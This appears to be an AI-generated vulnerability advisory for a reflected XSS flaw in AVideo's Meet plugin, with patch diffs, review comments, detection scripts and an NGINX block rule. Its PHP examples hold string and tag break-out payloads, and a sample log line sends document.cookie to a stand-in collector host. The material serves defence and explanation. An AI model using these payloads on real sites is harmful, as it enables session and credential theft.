CVE-2026-43878 Overview
CVE-2026-43878 is a reflected cross-site scripting (XSS) vulnerability in WWBN AVideo, an open source video platform. The flaw is in plugin/Meet/iframe.php, which echoes a value built from the attacker-controlled user and pass query parameters, without any encoding, into a double-quoted JavaScript string literal inside a <script> block. A crafted URL can close that string and run arbitrary JavaScript in the victim's browser under the AVideo origin. The issue affects WWBN AVideo versions up to and including 29.0 and requires no authentication when a public Meet schedule exists on the target instance. The weakness is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation).
Critical Impact
Unauthenticated attackers can run script in the AVideo origin of any visitor who opens a crafted Meet iframe URL: read the DOM and any session cookie not flagged HttpOnly, call authenticated API endpoints with the victim's ambient session, and harvest credentials through injected forms or redirects.
Affected Products
- WWBN AVideo versions up to and including 29.0
- WWBN AVideo Meet plugin (plugin/Meet/iframe.php)
- AVideo instances with a public Meet schedule enabled
Discovery Timeline
- 2026-05-11 - CVE-2026-43878 published to NVD
- 2026-05-12 - Last updated in NVD database
Technical Details for CVE-2026-43878
Vulnerability Analysis
The Meet plugin generates a small JavaScript shim that redirects the iframe after the meeting closes. The $readyToClose variable, derived from request parameters including user and pass, is interpolated directly into a double-quoted JavaScript string within a <script> tag. Because the value is neither HTML-encoded nor JavaScript-escaped, an attacker can supply input containing a closing double quote followed by arbitrary script, or a literal </script> sequence that terminates the element. The injected script executes in the AVideo origin, granting access to the DOM, to session cookies that are not flagged HttpOnly, and to authenticated API endpoints on the platform, which it can call with the victim's ambient credentials.
Root Cause
The root cause is interpolation of untrusted input into a JavaScript context without context-appropriate encoding. Before the fix, objects/user.php assembled a query string directly from $_REQUEST['user'] and $_REQUEST['pass'], and plugin/Meet/iframe.php echoed the resulting $readyToClose value straight into a <script> block. Neither step encoded the data, and the sink is reachable without authentication whenever a public Meet schedule exists, which is all that a reflected XSS needs.
Attack Vector
The attacker delivers a crafted URL to the victim through phishing, chat, or any link-sharing channel. When the victim loads the Meet iframe URL, the server reflects the attacker payload into the inline script. The injected JavaScript runs with the privileges of the victim, enabling session theft, forced actions, and credential harvesting against the AVideo origin.
// Patch in plugin/Meet/iframe.php
function _readyToClose() {
- document.location = "<?php echo $readyToClose; ?>";
+ document.location = <?php echo json_encode($readyToClose, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT); ?>;
}
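Review bot: json_encode on the new line can still produce broken output: when $readyToClose is not valid UTF-8 it returns false, and echo prints false as an empty string, so the emitted statement becomes `document.location = ;` and the shim throws a syntax error instead of redirecting. Either add JSON_INVALID_UTF8_SUBSTITUTE to the flag set or test the return value for false and emit "" in that case. Dropping the surrounding double quotes is correct, since json_encode supplies the literal's own quotes, and the JSON_HEX_* flags cover the </script> and quote break-outs, so the encoding itself is sound.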
The fix replaces the bare echo with json_encode. json_encode emits a complete JavaScript string literal, quotes included (which is why the template's own double quotes are removed), and the JSON_HEX_TAG, JSON_HEX_AMP, JSON_HEX_APOS and JSON_HEX_QUOT flags encode <, >, &, ' and " as \uXXXX escapes, so a payload can close neither the string literal nor the enclosing <script> element. A companion change in objects/user.php wraps each credential with rawurlencode before building the query string:
// Patch in objects/user.php
-$return = "user={$_REQUEST['user']}&pass={$_REQUEST['pass']}";
+$return = "user=" . rawurlencode((string) $_REQUEST['user']) . "&pass=" . rawurlencode((string) $_REQUEST['pass']);
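Review bot: rawurlencode is the right encoder for a query-string component, but the (string) cast on the added line hides a type problem rather than fixing it: a request with user[]=x makes $_REQUEST['user'] an array, and casting it yields the literal string "Array" plus an "Array to string conversion" warning, so $return becomes user=Array&pass=... instead of the request being rejected. Check is_string() on both values (or read them through filter_input) and fail closed on anything else before building $return.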
Source: WWBN AVideo Commit 3298ced
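To see why the encoding matters, the following PHP is an added example, not AVideo's code and not part of the commit above: it reduces the sink in plugin/Meet/iframe.php to the pre-patch and patched template shapes quoted on this page and renders three constructed inputs through each, including one that is not valid UTF-8 to show the json_encode failure mode. Function names, payload values and the empty-literal fallback are this example's own choices.

```php
<?php
declare(strict_types=1);
// Added example; not code from AVideo or from the advisory. It reduces the sink
// in plugin/Meet/iframe.php to two template functions, the pre-patch shape and
// the patched shape quoted on this page, and renders constructed payloads
// through both. Function names, payload values and the fallback for invalid
// UTF-8 are this example's own choices.

// Pre-patch shape: the value is spliced into a double-quoted JS string.
function renderVulnerable(string $readyToClose): string
{
    return '<script>function _readyToClose(){document.location = "'
        . $readyToClose . '";}</script>';
}

// Patched shape: json_encode emits the complete string literal, quotes
// included, and the JSON_HEX_* flags encode " ' < > & as \uXXXX, so the
// payload can close neither the literal nor the enclosing <script> element.
function renderFixed(string $readyToClose): string
{
    $literal = json_encode(
        $readyToClose,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
    );
    if ($literal === false) {
        // json_encode returns false on malformed UTF-8; emit an empty literal
        // rather than the syntax error "document.location = ;".
        $literal = '""';
    }
    return '<script>function _readyToClose(){document.location = '
        . $literal . ';}</script>';
}

// Does any byte that can change the parse context survive unencoded between
// "document.location = " and the closing ";}</script>"? The outermost pair
// of quotes legitimately delimits the literal and is discounted.
function emitsUnencodedMetachar(string $html): bool
{
    $prefix = 'document.location = ';
    $start  = strpos($html, $prefix) + strlen($prefix);
    $end    = strrpos($html, ';}</script>');
    $body   = substr($html, $start, $end - $start);
    $inner  = preg_replace('/^"(.*)"$/s', '$1', $body);
    return preg_match('/["\'<>&]/', $inner) === 1;
}

// Constructed inputs in the shape the page describes (a user=...&pass=...
// query string). The first closes the JS string and comments out the rest
// of the line, the second closes the <script> element, the third is not
// valid UTF-8 and exercises the json_encode failure path.
$inputs = [
    'string break-out' => 'user=alice&pass=";alert(document.domain)//',
    'tag break-out'    => 'user=alice&pass=</script><script>alert(1)</script>',
    'invalid UTF-8'    => "user=alice&pass=\xC3",
];

foreach ($inputs as $name => $value) {
    $vuln  = renderVulnerable($value);
    $fixed = renderFixed($value);
    echo "== $name ==\n";
    echo "vulnerable: $vuln\n";
    echo "fixed:      $fixed\n";
    printf(
        "unencoded metacharacter survives: vulnerable=%s fixed=%s\n\n",
        emitsUnencodedMetachar($vuln) ? 'yes' : 'no',
        emitsUnencodedMetachar($fixed) ? 'yes' : 'no'
    );
}
```

Running it with the PHP CLI shows the double quote and the angle brackets surviving verbatim in the vulnerable rendering and arriving as \u0022, \u003C and \u003E in the fixed one; the last case shows why the false return of json_encode must be handled, since the upstream template as quoted above does not check it.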
Detection Methods for CVE-2026-43878
Indicators of Compromise
- Web server access logs containing requests to plugin/Meet/iframe.php whose user or pass query parameters contain a double quote, angle brackets, or script-like tokens such as onerror=, document.cookie or <script>. Because the sink is a JavaScript string literal, a working payload needs only a double quote followed by JavaScript (for example %22;...//), so signatures that look only for <script> tags will miss it.
- URL-encoded forms of those characters in user or pass, such as %22, %3C or %3E, directed at the Meet iframe endpoint.
- Outbound browser requests from authenticated AVideo sessions to attacker-controlled domains shortly after a visit to a Meet URL.
Detection Strategies
- Inspect HTTP request logs for anomalous query strings targeting plugin/Meet/iframe.php, focusing on length, percent-encoding density, and the presence of script-like tokens after decoding.
- Deploy a web application firewall (WAF) rule that rejects requests in which the decoded user or pass parameter contains a double quote or an angle bracket. Because the vulnerable code reads $_REQUEST, the rule must inspect POST bodies (and, depending on PHP's request_order, cookies) as well as the query string.
- Correlate Referer headers and User-Agent patterns to identify mass distribution of crafted Meet URLs.
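The log-inspection strategy above, as an added PHP example that is not from the advisory or from AVideo: it parses constructed combined-format access log lines, decodes user and pass the way $_GET would, and flags values that could close the JavaScript string literal or the <script> element. The log lines, function names and token list are constructed for this example, and the path match assumes the default AVideo location /plugin/Meet/iframe.php.

```php
<?php
declare(strict_types=1);
// Added example; not from the advisory or AVideo. It triages combined-format
// access log lines, decodes the user and pass parameters of requests to
// plugin/Meet/iframe.php the way PHP populates $_GET from the query string,
// and reports parameters that could break out of the JS string literal.
// The log lines, function names and token list are constructed.

// A double quote is the one byte that ends the string literal in this sink;
// angle brackets cover the </script> variant; the rest are generic markers.
const MEET_XSS_PATTERN = '/["<>]|onerror\s*=|document\.cookie|javascript:/i';

/** Extract method, path and query from a combined-format access log line. */
function parseRequestLine(string $line): ?array
{
    if (!preg_match('/"(?P<method>[A-Z]+) (?P<target>\S+) HTTP\/[\d.]+"/', $line, $m)) {
        return null;
    }
    $parts = parse_url($m['target']);
    if ($parts === false) {
        return null;
    }
    return [
        'method' => $m['method'],
        'path'   => $parts['path'] ?? '',
        'query'  => $parts['query'] ?? '',
    ];
}

/** Names of suspicious parameters in one line; an empty array means clean. */
function suspiciousMeetParams(string $line): array
{
    $req = parseRequestLine($line);
    if ($req === null || !preg_match('#/plugin/Meet/iframe\.php$#', $req['path'])) {
        return [];
    }
    parse_str($req['query'], $params);   // percent-decodes once, like $_GET
    $hits = [];
    foreach (['user', 'pass'] as $name) {
        $value = $params[$name] ?? null;
        if (is_array($value)) {
            $hits[] = $name . '[]';      // ?user[]=x is never a legitimate credential
        } elseif (is_string($value) && preg_match(MEET_XSS_PATTERN, $value) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Constructed sample log (RFC 5737 addresses): one benign Meet request, a
// string break-out, a tag break-out, an array-typed parameter, and an
// unrelated endpoint that a Meet-specific rule must not flag.
$sampleLog = [
    '203.0.113.7 - - [11/May/2026:10:01:02 +0000] "GET /plugin/Meet/iframe.php?user=alice&pass=s3cret HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [11/May/2026:10:01:09 +0000] "GET /plugin/Meet/iframe.php?user=alice&pass=%22;fetch(%27//collector.example/%27%2Bdocument.cookie)// HTTP/1.1" 200 640 "https://chat.example/" "Mozilla/5.0"',
    '198.51.100.4 - - [11/May/2026:10:02:30 +0000] "GET /plugin/Meet/iframe.php?user=bob&pass=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 700 "-" "curl/8.0"',
    '198.51.100.4 - - [11/May/2026:10:02:31 +0000] "GET /plugin/Meet/iframe.php?user[]=x&pass=y HTTP/1.1" 200 300 "-" "curl/8.0"',
    '192.0.2.9 - - [11/May/2026:10:03:00 +0000] "GET /index.php?search=%22%3E%3Cscript%3E HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
];

foreach ($sampleLog as $line) {
    $hits = suspiciousMeetParams($line);
    if ($hits !== []) {
        echo 'ALERT [', implode(', ', $hits), '] ', $line, "\n";
    }
}
```

Run with the PHP CLI, the second and third lines are flagged on pass, the fourth on user[], and the first and fifth stay silent. Because the vulnerable code reads $_REQUEST, the same parameters sent in a POST body never appear in the access log, so this triage covers only the GET form of the attack; the POST form needs a WAF or application-side check.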
Monitoring Recommendations
- Enable Content-Security-Policy reporting (Content-Security-Policy-Report-Only with report-to or report-uri) to capture script-src violations. A payload that merely closes the string literal stays inside the page's own inline <script> element and raises no violation, so CSP reports mainly catch the </script><script> and event-handler variants and, through connect-src or img-src, the exfiltration step.
- Alert on authentication events that follow a Meet iframe page load from an external referrer.
- Centralize and retain web server logs, including full query strings, for forensic review of reflected XSS attempts.
How to Mitigate CVE-2026-43878
Immediate Actions Required
- Upgrade WWBN AVideo to a release containing commit 3298ced2bcf92e4f3acff6ce9bde14edf42ecb5b or later.
- Audit existing public Meet schedules and remove or restrict any that are not required to be publicly accessible.
- Rotate session secrets and force re-authentication if exploitation is suspected.
Patch Information
The upstream fix is published in commit 3298ced2bcf92e4f3acff6ce9bde14edf42ecb5b. It introduces json_encode with hex-encoding flags around the reflected value in plugin/Meet/iframe.php and wraps credentials with rawurlencode in objects/user.php. See the WWBN AVideo Security Advisory GHSA-mm5f-8q57-4fc4 for vendor guidance.
Workarounds
- Restrict access to plugin/Meet/iframe.php at the reverse proxy or WAF level, rejecting requests whose user or pass parameters contain quotes or angle brackets in the query string or, since the code reads $_REQUEST, in a POST body.
- Disable the Meet plugin until the patch is applied if it is not required for operations.
- Enforce a strict Content Security Policy without 'unsafe-inline'. The legitimate redirect shim is itself an inline script, so the policy must authorize it with a nonce or hash or it will break. Such a policy blocks payloads that open a new script element or event handler and, via connect-src and img-src, limits exfiltration, but it cannot stop a payload that stays inside the already-authorized inline script, so it reduces rather than removes the impact.
# Example NGINX rule to reject suspicious Meet iframe requests by query string.
# (^|&) anchors on the parameter boundary so that other parameters ending in
# "user" or "pass" are not matched; ~* makes the match case-insensitive so both
# %3c and %3C are caught. $args is the raw, undecoded query string, so both the
# percent-encoded and the literal forms are listed. This rule never sees a POST
# body, which $_REQUEST also reads, so the POST form needs a separate check.
location ~ ^/plugin/Meet/iframe\.php$ {
    if ($args ~* "(^|&)(user|pass)=[^&]*(%22|%3C|%3E|\"|<|>)") {
        return 403;
    }
    # the instance's normal PHP handler directives (fastcgi_pass etc.) follow here
}
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


